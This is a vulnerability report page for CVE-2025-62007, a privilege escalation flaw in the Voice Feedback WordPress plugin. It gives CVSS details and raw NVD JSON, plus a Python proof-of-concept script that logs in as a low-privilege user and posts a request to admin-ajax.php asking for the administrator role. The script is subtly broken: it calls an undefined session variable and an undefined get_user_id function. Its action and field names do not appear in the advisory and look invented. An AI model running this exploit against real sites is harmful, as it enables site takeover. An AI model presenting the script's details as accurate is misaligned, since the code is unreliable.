Security Vulnerability Report
中文
CVE-2025-62007 CVSS 8.8 HIGH

CVE-2025-62007

Published: 2025-10-22 15:16:03
Last Modified: 2026-04-15 00:35:42

Description

Incorrect Privilege Assignment vulnerability in bPlugins Voice Feedback voice-feedback allows Privilege Escalation.This issue affects Voice Feedback: from n/a through <= 1.0.3.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

bPlugins Voice Feedback <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62007 PoC - WordPress Voice Feedback Plugin Privilege Escalation # Target: WordPress site with Voice Feedback plugin <= 1.0.3 import requests import sys from bs4 import BeautifulSoup def get_nonce(target_url, cookie): """Get security nonce from admin page""" admin_url = f"{target_url}/wp-admin/admin.php?page=voice-feedback" response = session.get(admin_url, cookies=cookie) if response.status_code == 200: soup = BeautifulSoup(response.text, 'html.parser') nonce_tag = soup.find('input', {'id': 'voice_feedback_nonce'}) if nonce_tag: return nonce_tag.get('value') return None def exploit_privilege_escalation(target_url, username, password): """Exploit the privilege escalation vulnerability""" session = requests.Session() # Step 1: Login as low-privilege user (subscriber) login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Logged in as low-privilege user") # Step 2: Get nonce from admin page (bypass due to insufficient checks) nonce = get_nonce(target_url, session.cookies) if not nonce: print("[-] Could not obtain nonce") return False print(f"[+] Obtained nonce: {nonce[:10]}...") # Step 3: Exploit the privilege escalation exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'voice_feedback_save_settings', 'voice_feedback_nonce': nonce, 'new_role': 'administrator', 'user_id': get_user_id(target_url, session.cookies) } exploit_response = session.post(exploit_url, data=exploit_data) if exploit_response.status_code == 200: print("[+] Privilege escalation attempt sent") print("[+] Check if user role has been elevated to administrator") return True return False def main(): if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_privilege_escalation(target, user, pwd) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62007", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:02.530", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in bPlugins Voice Feedback voice-feedback allows Privilege Escalation.This issue affects Voice Feedback: from n/a through <= 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/voice-feedback/vulnerability/wordpress-voice-feedback-plugin-1-0-3-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}